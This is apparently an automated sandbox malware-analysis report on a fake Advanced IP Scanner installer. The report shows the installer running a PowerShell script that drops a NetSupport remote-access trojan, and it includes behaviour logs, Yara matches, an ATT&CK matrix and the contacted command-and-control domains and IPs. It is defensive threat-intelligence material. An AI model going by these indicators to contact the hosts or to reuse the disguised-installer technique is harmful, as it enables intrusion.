                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_1101D180 __time64,SetRect,GetLocalTime,7_2_1101D180
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_1103B220 _calloc,GetUserNameA,_free,_calloc,_free,7_2_1103B220
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_1109D4A0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,7_2_1109D4A0
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_6859A980 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,InitializeCriticalSection,getsockname,LeaveCriticalSection,GetTickCount,InterlockedExchange,7_2_6859A980
                                  Source: Yara matchFile source: 7.2.client32.exe.688b0000.6.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 8.2.client32.exe.688b0000.5.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 8.0.client32.exe.400000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 8.2.client32.exe.400000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 7.2.client32.exe.400000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 10.0.client32.exe.400000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 7.0.client32.exe.400000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 10.2.client32.exe.688b0000.5.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 8.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 10.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 10.2.client32.exe.400000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 7.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 7.2.client32.exe.68890000.5.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 10.2.client32.exe.68890000.4.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 8.2.client32.exe.68890000.4.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 7.2.client32.exe.68590000.3.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 8.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 10.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 7.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000007.00000000.2061459893.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000008.00000002.2161014488.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000A.00000002.2249175114.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000008.00000000.2158956147.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000A.00000002.2248759340.0000000000708000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000007.00000002.3638481461.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000A.00000000.2240623467.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000008.00000002.2160969972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000A.00000002.2248546826.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000A.00000002.2249132975.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000008.00000002.2160400872.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000007.00000002.3639184086.0000000002572000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7132, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: client32.exe PID: 5304, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: client32.exe PID: 2228, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: client32.exe PID: 1832, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SysHelper\AudioCapture.dll, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SysHelper\TCCTL32.DLL, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SysHelper\pcicapi.dll, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SysHelper\HTCTL32.DLL, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SysHelper\PCICHEK.DLL, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SysHelper\PCICL32.DLL, type: DROPPED
                                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                  Gather Victim Identity InformationAcquire Infrastructure2
                                  Valid Accounts
                                  1
                                  Windows Management Instrumentation
                                  1
                                  DLL Side-Loading
                                  1
                                  DLL Side-Loading
                                  1
                                  Deobfuscate/Decode Files or Information
                                  OS Credential Dumping11
                                  System Time Discovery
                                  Remote Services1
                                  Archive Collected Data
                                  1
                                  Ingress Tool Transfer
                                  Exfiltration Over Other Network Medium1
                                  System Shutdown/Reboot
                                  CredentialsDomainsDefault Accounts3
                                  Native API
                                  1
                                  DLL Search Order Hijacking
                                  1
                                  DLL Search Order Hijacking
                                  3
                                  Obfuscated Files or Information
                                  LSASS Memory1
                                  Account Discovery
                                  Remote Desktop Protocol1
                                  Screen Capture
                                  22
                                  Encrypted Channel
                                  Exfiltration Over Bluetooth1
                                  Defacement
                                  Email AddressesDNS ServerDomain Accounts2
                                  Command and Scripting Interpreter
                                  2
                                  Valid Accounts
                                  2
                                  Valid Accounts
                                  11
                                  Software Packing
                                  Security Account Manager1
                                  System Service Discovery
                                  SMB/Windows Admin Shares3
                                  Clipboard Data
                                  3
                                  Non-Application Layer Protocol
                                  Automated ExfiltrationData Encrypted for Impact
                                  Employee NamesVirtual Private ServerLocal Accounts2
                                  PowerShell
                                  11
                                  Registry Run Keys / Startup Folder
                                  21
                                  Access Token Manipulation
                                  1
                                  DLL Side-Loading
                                  NTDS3
                                  File and Directory Discovery
                                  Distributed Component Object ModelInput Capture4
                                  Application Layer Protocol
                                  Traffic DuplicationData Destruction
                                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
                                  Process Injection
                                  1
                                  DLL Search Order Hijacking
                                  LSA Secrets33
                                  System Information Discovery
                                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts11
                                  Registry Run Keys / Startup Folder
                                  2
                                  Masquerading
                                  Cached Domain Credentials151
                                  Security Software Discovery
                                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                                  Valid Accounts
                                  DCSync2
                                  Process Discovery
                                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                                  Virtualization/Sandbox Evasion
                                  Proc Filesystem31
                                  Virtualization/Sandbox Evasion
                                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                                  Access Token Manipulation
                                  /etc/passwd and /etc/shadow11
                                  Application Window Discovery
                                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
                                  Process Injection
                                  Network Sniffing3
                                  System Owner/User Discovery
                                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                  Hide Legend

                                  Legend:

                                  • Process
                                  • Signature
                                  • Created File
                                  • DNS/IP Info
                                  • Is Dropped
                                  • Is Windows Process
                                  • Number of created Registry Values
                                  • Number of created Files
                                  • Visual Basic
                                  • Delphi
                                  • Java
                                  • .Net C# or VB.NET
                                  • C, C++ or other language
                                  • Is malicious
                                  • Internet
                                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1546304 Sample: Advanced_IP_Scanner_2.5.459... Startdate: 31/10/2024 Architecture: WINDOWS Score: 56 48 payiki.com 2->48 50 anyhowdo.com 2->50 52 geo.netsupportsoftware.com 2->52 62 Suricata IDS alerts for network traffic 2->62 64 Malicious sample detected (through community Yara rule) 2->64 66 Sigma detected: Powershell drops NetSupport RAT client 2->66 68 4 other signatures 2->68 9 Advanced_IP_Scanner_2.5.4594.12.exe 2 2->9         started        12 client32.exe 2->12         started        14 client32.exe 2->14         started        signatures3 process4 file5 46 C:\...\Advanced_IP_Scanner_2.5.4594.12.tmp, PE32 9->46 dropped 16 Advanced_IP_Scanner_2.5.4594.12.tmp 25 149 9->16         started        process6 file7 30 C:\Program Files (x86)\...\is-FDUCH.tmp, PE32 16->30 dropped 32 C:\Users\user\AppData\Local\...\cispn.ps1, ASCII 16->32 dropped 34 C:\Program Files (x86)\...\unins000.dat, InnoSetup 16->34 dropped 36 116 other files (none is malicious) 16->36 dropped 60 Bypasses PowerShell execution policy 16->60 20 powershell.exe 1 55 16->20         started        signatures8 process9 file10 38 C:\Users\user\AppData\...\remcmdstub.exe, PE32 20->38 dropped 40 C:\Users\user\AppData\Roaming\...\pcicapi.dll, PE32 20->40 dropped 42 C:\Users\user\AppData\...\client32.exe, PE32 20->42 dropped 44 7 other files (6 malicious) 20->44 dropped 70 Found suspicious powershell code related to unpacking or dynamic code loading 20->70 72 Loading BitLocker PowerShell Module 20->72 74 Powershell drops PE file 20->74 24 client32.exe 17 20->24         started        28 conhost.exe 20->28         started        signatures11 process12 dnsIp13 54 anyhowdo.com 199.188.200.195, 443, 49740 NAMECHEAP-NETUS United States 24->54 56 payiki.com 151.236.16.15, 443, 49739 HVC-ASUS European Union 24->56 58 geo.netsupportsoftware.com 104.26.1.231, 49741, 80 CLOUDFLARENETUS United States 24->58 76 Contains functionalty to change the wallpaper 24->76 78 Contains functionality to detect sleep reduction / modifications 24->78 signatures14

                                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                  windows-stand
                                  SourceDetectionScannerLabelLink
                                  Advanced_IP_Scanner_2.5.4594.12.exe3%ReversingLabs
                                  SourceDetectionScannerLabelLink
                                  C:\Program Files (x86)\Advanced IP Scanner\Qt5Core.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\Qt5Gui.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\Qt5Network.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\Qt5PrintSupport.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\Qt5Widgets.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\Qt5WinExtras.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\Qt5Xml.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner.exe (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_console.exe (copy)3%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-console-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-datetime-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-debug-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-errorhandling-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l1-2-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l2-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-handle-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-heap-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-interlocked-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-libraryloader-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-localization-l1-2-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-memory-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-namedpipe-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processenvironment-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processthreads-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processthreads-l1-1-1.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-profile-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-rtlsupport-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-string-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-synch-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-synch-l1-2-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-sysinfo-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-timezone-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-util-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-conio-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-convert-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-environment-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-filesystem-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-heap-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-locale-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-math-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-multibyte-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-private-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-process-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-runtime-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-stdio-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-string-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-time-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-utility-l1-1-0.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-087J4.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-2CC7N.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-37BEP.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-3ARML.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-3DFK3.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-4D790.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-4DCVH.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-4PSUK.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-50T4N.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-51B0J.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-6GDPR.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-7T7KO.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-7UOKJ.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-8ANUI.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-8I66A.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-8NFDN.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-94LO6.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-9QSUE.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-B6942.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-BI69I.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-CFBB0.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-E5GMR.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Advanced IP Scanner\is-FDUCH.tmp0%ReversingLabs
